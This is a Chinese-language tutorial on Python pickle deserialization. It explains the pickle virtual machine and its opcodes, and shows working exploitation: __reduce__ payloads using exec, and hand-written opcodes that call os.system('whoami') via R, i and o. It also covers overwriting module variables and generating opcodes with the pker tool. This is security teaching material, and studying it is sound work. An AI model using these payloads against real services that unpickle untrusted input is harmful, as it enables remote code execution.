Pickle序列化过程

pickle解析依靠PVM完成,PVM包含三部分:

指令处理器(解析引擎):读取opcode和参数,直到遇到`.`停止,最终留在栈顶的值将被作为反序列化对象返回
stack:由 Python 的 list 实现,被用来临时存储数据、参数以及对象
memo:由 Python 的 dict 实现,为 PVM 的整个生命周期提供存储,即将反序列化后的结果以键值对形式存储

opcode

pickle的版本不同会导致生成的opcode不同,但是pickle可以向下兼容,即v0版本的序列化内容可以被其他任意版本解析

v0版本常用opcode:

c:c[module]\n[instance]\n,获得的对象入栈,等同于import
o:寻找栈中的上一个MARK,之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象),函数的返回值(或生成的对象)入栈
(:向栈中压入一个MARK标记
S:S'xxx'\n,实例化一个字符串对象,获得的对象入栈
s:将栈顶的第二个和第一个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典)中,第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
V:Vxxx\n,实例化一个UNICODE字符串对象,获得的对象入栈
i:i[module]\n[callable]\n,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行函数(或实例化一个对象),函数返回值(或生成的对象)入栈
d:寻找栈中的上一个MARK,并组合之间的数据为字典,数据必须有偶数个,即呈key-value对,MARK标记以及被组合的数据出栈,获得的对象入栈
b:使用栈顶的第一个数据(储存键值对的字典),对第二个数据(对象实例)进行属性设置,栈顶第一个数据出栈
t:寻找栈中的上一个MARK,并组合之间的数据为元组,MARK标记以及被组合的数据出栈,获得的对象入栈
R: 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数,函数和参数出栈,函数的返回值入栈
p:pn\n,将栈顶对象储存至memo_n

pickletools

使用pickletools可以将opcode转为可视化的结构,可读性更强,例如:

import pickle
import pickletools

a = {"abc":123, "456":"DEF"}

ser = pickle.dumps(a, protocol=0)
print(b"opcode: " + ser)

pickletools.dis(ser)

运行结果
b'opcode: (dp0\nVabc\np1\nI123\nsV456\np2\nVDEF\np3\ns.'
    0: (    MARK
    1: d        DICT       (MARK at 0)
    2: p    PUT        0
    5: V    UNICODE    'abc'
   10: p    PUT        1
   13: I    INT        123
   18: s    SETITEM
   19: V    UNICODE    '456'
   24: p    PUT        2
   27: V    UNICODE    'DEF'
   32: p    PUT        3
   35: s    SETITEM
   36: .    STOP
highest protocol among opcodes = 0

pickle反序列化利用思路

RCE

__reduce__()魔术方法在序列化时被调用,即pickle.dumps(),返回值决定了反序列化时的行为,即pickle.loads():

def __reduce__(self) -> str | tuple[Any, ...]: ...

必须返回字符串或元组,假如返回元组可实现代码执行:

def __reduce__(self):
    return (callable, (arg1, arg2, ...))

callable是要执行的函数,arg是参数,简单利用例子:

import pickle

class test(object):
    def __reduce__(self):
        s = "print('command1 executed');print('command2 executed')"  # 要执行的命令
        return (exec, (s,))

ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)

变量覆盖

import pickle

key = 1
class test(object):
    def __reduce__(self):
        s = "key=258"
        return (exec, (s,))

ser = pickle.dumps(test(), protocol=0)
pickle.loads(ser)

print(key)  # 258

手写opcode

如果过滤或禁用了exec,将无法使用__reduce__()来执行多段代码,此时就需要手写opcode

变量覆盖

secret.py:

key = "sxc"

尝试覆盖secret.py中的变量:

import pickle
import secret

opcode = """c__main__
secret
(S'key'
S'258'
db.
"""

print(secret.key)  # sxc
pickle.loads(opcode.encode())
print(secret.key)  # 258

RCE

可以通过R,i,o三种方式执行命令

R:

cos
system
(S'whoami'
tR.

i:

(S'whoami'
ios
system
.

o:

(cos
system
S'whoami'
o.

实例化对象

import pickle

class User:
    def __init__(self, name, age):
        self.name = name
        self.age = age

opcode='''c__main__
User
(S'ChuanSao'
S"258"
tR.'''

user = pickle.loads(opcode.encode())
print(user.name, user.age)  # ChuanSao 258

pker

Tools for converting Python source code to Pickle opcode automatically

工具地址:https://github.com/eddieivan01/pker

pker主要用到GLOBAL、INST、OBJ三种特殊的函数以及一些必要的转换方式:

GLOBAL 对应 opcode:c
GLOBAL('os', 'system') 对应 opcode:cos\nsystem\n

INST 对应 opcode:i
INST('os', 'system', 'whoami') 对应 opcode:(S'whoami'\nios\nsystem\n

OBJ 对应 opcode:o
OBJ(GLOBAL('os', 'system'), 'whoami') 对应 opcode:(cos\nsystem\nS'whoami'\no

xxx.attr='sxc' 对应opcode:(S'attr'\nS'sxc'\ndb

return 对应 opcode:.

基本用法

pker:

INST('os', 'system', 'whoami')
return

利用pker.py转换为opcode:

python pker.py < pker
b"(S'whoami'\nios\nsystem\n."

opcode表:

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4

SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame

# Protocol 5

BYTEARRAY8       = b'\x96'  # push bytearray
NEXT_BUFFER      = b'\x97'  # push next out-of-band buffer
READONLY_BUFFER  = b'\x98'  # make top of stack readonly

参考资料:

https://xz.aliyun.com/news/13498

https://xz.aliyun.com/news/7032

https://zixyd.github.io/2024/02/06/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/